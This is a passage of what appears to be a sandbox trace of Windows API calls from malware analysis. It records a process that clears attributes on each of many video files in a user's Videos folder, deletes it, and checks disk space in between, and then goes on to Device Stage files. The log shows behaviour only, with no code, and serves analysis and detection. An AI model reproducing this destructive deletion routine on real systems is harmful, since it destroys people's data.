HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\80_LAq1cZxBo5YKQM.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2tousykinuwnv4x\\80_laq1czxbo5ykqm.avi")) returned 1 [0155.453] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0155.463] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\92jXSnPykeEjWCy.flv", dwFileAttributes=0x80) returned 1 [0155.463] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\92jXSnPykeEjWCy.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2tousykinuwnv4x\\92jxsnpykeejwcy.flv")) returned 1 [0155.467] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0155.473] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\c7ba-1x.swf", dwFileAttributes=0x80) returned 1 [0155.474] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\c7ba-1x.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2tousykinuwnv4x\\c7ba-1x.swf")) returned 1 [0155.477] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0155.487] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\DpA0AxhT1 C.flv", dwFileAttributes=0x80) returned 1 [0155.488] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\DpA0AxhT1 C.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2tousykinuwnv4x\\dpa0axht1 c.flv")) returned 1 [0155.491] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0155.500] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\G60n3q.swf", dwFileAttributes=0x80) returned 1 [0155.500] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\G60n3q.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2tousykinuwnv4x\\g60n3q.swf")) returned 1 [0155.504] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0155.514] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\hJym.mp4", dwFileAttributes=0x80) returned 1 [0155.515] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\hJym.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2tousykinuwnv4x\\hjym.mp4")) returned 1 [0155.518] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0155.524] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\ilfhwFImkV7KauKq5GM.avi", dwFileAttributes=0x80) returned 1 [0155.524] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\ilfhwFImkV7KauKq5GM.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2tousykinuwnv4x\\ilfhwfimkv7kaukq5gm.avi")) returned 1 [0155.527] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0155.533] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\j_It.flv", dwFileAttributes=0x80) returned 1 [0155.534] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\j_It.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2tousykinuwnv4x\\j_it.flv")) returned 1 [0155.537] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0155.545] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\pn60s76nVNO-0wgoW8c.flv", dwFileAttributes=0x80) returned 1 [0155.546] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\pn60s76nVNO-0wgoW8c.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2tousykinuwnv4x\\pn60s76nvno-0wgow8c.flv")) returned 1 [0155.549] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0155.573] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\QxdjDxyr FNi4m.mp4", dwFileAttributes=0x80) returned 1 [0155.574] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\QxdjDxyr FNi4m.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2tousykinuwnv4x\\qxdjdxyr fni4m.mp4")) returned 1 [0155.578] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0155.590] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\WihjygmOb88X82G.avi", dwFileAttributes=0x80) returned 1 [0155.591] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\WihjygmOb88X82G.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2tousykinuwnv4x\\wihjygmob88x82g.avi")) returned 1 [0155.594] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0155.602] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\y6yRJEhunpqjmfmvMn7.swf", dwFileAttributes=0x80) returned 1 [0155.602] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\y6yRJEhunpqjmfmvMn7.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2tousykinuwnv4x\\y6yrjehunpqjmfmvmn7.swf")) returned 1 [0155.605] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0155.616] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\ZfSDDeQ0f09mue3.swf", dwFileAttributes=0x80) returned 1 [0155.616] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\ZfSDDeQ0f09mue3.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2tousykinuwnv4x\\zfsddeq0f09mue3.swf")) returned 1 [0155.619] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0155.626] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\ZhbGZUEcIk7gDfjTf.mp4", dwFileAttributes=0x80) returned 1 [0155.627] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\ZhbGZUEcIk7gDfjTf.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2tousykinuwnv4x\\zhbgzuecik7gdfjtf.mp4")) returned 1 [0155.630] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0155.638] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\zlGKV.flv", dwFileAttributes=0x80) returned 1 [0155.639] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\zlGKV.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2tousykinuwnv4x\\zlgkv.flv")) returned 1 [0155.643] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.643] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.643] CoTaskMemFree (pv=0x508980) [0155.645] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.645] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.645] CoTaskMemFree (pv=0x508980) [0155.646] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.646] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.646] CoTaskMemFree (pv=0x508980) [0155.647] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.647] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.648] CoTaskMemFree (pv=0x508980) [0155.648] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.649] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.649] CoTaskMemFree (pv=0x508980) [0155.650] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.650] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.650] CoTaskMemFree (pv=0x508980) [0155.651] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.651] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.651] CoTaskMemFree (pv=0x508980) [0155.652] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.652] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.652] CoTaskMemFree (pv=0x508980) [0155.656] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.656] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.656] CoTaskMemFree (pv=0x508980) [0155.659] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.659] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.659] CoTaskMemFree (pv=0x508980) [0155.662] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.662] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.662] CoTaskMemFree (pv=0x508980) [0155.664] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.664] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.664] CoTaskMemFree (pv=0x508980) [0155.666] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.666] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.667] CoTaskMemFree (pv=0x508980) [0155.668] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.668] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.668] CoTaskMemFree (pv=0x508980) [0155.669] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.669] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.669] CoTaskMemFree (pv=0x508980) [0155.670] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.670] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.670] CoTaskMemFree (pv=0x508980) [0155.671] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.671] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.671] CoTaskMemFree (pv=0x508980) [0155.675] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.675] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.675] CoTaskMemFree (pv=0x508980) [0155.676] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.676] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.676] CoTaskMemFree (pv=0x508980) [0155.677] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.677] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.678] CoTaskMemFree (pv=0x508980) [0155.679] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.679] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.679] CoTaskMemFree (pv=0x508980) [0155.680] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.680] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.680] CoTaskMemFree (pv=0x508980) [0155.681] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.681] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.681] CoTaskMemFree (pv=0x508980) [0155.682] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.682] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.682] CoTaskMemFree (pv=0x508980) [0155.683] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.683] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.683] CoTaskMemFree (pv=0x508980) [0155.684] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.684] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.684] CoTaskMemFree (pv=0x508980) [0155.685] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.685] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.686] CoTaskMemFree (pv=0x508980) [0155.688] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0155.703] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", dwFileAttributes=0x80) returned 0 [0155.708] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0155.714] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml", dwFileAttributes=0x80) returned 0 [0155.718] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0155.744] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png", dwFileAttributes=0x80) returned 0 [0155.748] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0155.756] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", dwFileAttributes=0x80) returned 0 [0155.760] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0155.768] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", dwFileAttributes=0x80) returned 0 [0155.771] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.771] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.771] CoTaskMemFree (pv=0x508980) [0155.773] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0155.787] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", dwFileAttributes=0x80) returned 0 [0155.792] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0155.797] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml", dwFileAttributes=0x80) returned 0 [0155.802] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0155.809] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", dwFileAttributes=0x80) returned 0 [0155.811] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.811] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.812] CoTaskMemFree (pv=0x508980) [0155.812] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.812] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.813] CoTaskMemFree (pv=0x508980) [0155.815] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0155.821] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml", dwFileAttributes=0x80) returned 0 [0155.825] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0155.831] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml", dwFileAttributes=0x80) returned 0 [0155.834] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.834] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.835] CoTaskMemFree (pv=0x508980) [0155.836] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0155.842] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml", dwFileAttributes=0x80) returned 0 [0155.844] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.844] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.845] CoTaskMemFree (pv=0x508980) [0155.847] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0155.852] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml", dwFileAttributes=0x80) returned 0 [0155.854] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.854] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.855] CoTaskMemFree (pv=0x508980) [0155.856] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0155.861] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml", dwFileAttributes=0x80) returned 0 [0155.864] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.864] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.864] CoTaskMemFree (pv=0x508980) [0155.864] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.864] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.865] CoTaskMemFree (pv=0x508980) [0155.865] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.865] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.866] CoTaskMemFree (pv=0x508980) [0155.866] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.866] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.866] CoTaskMemFree (pv=0x508980) [0155.867] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.867] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.867] CoTaskMemFree (pv=0x508980) [0155.867] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.867] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | 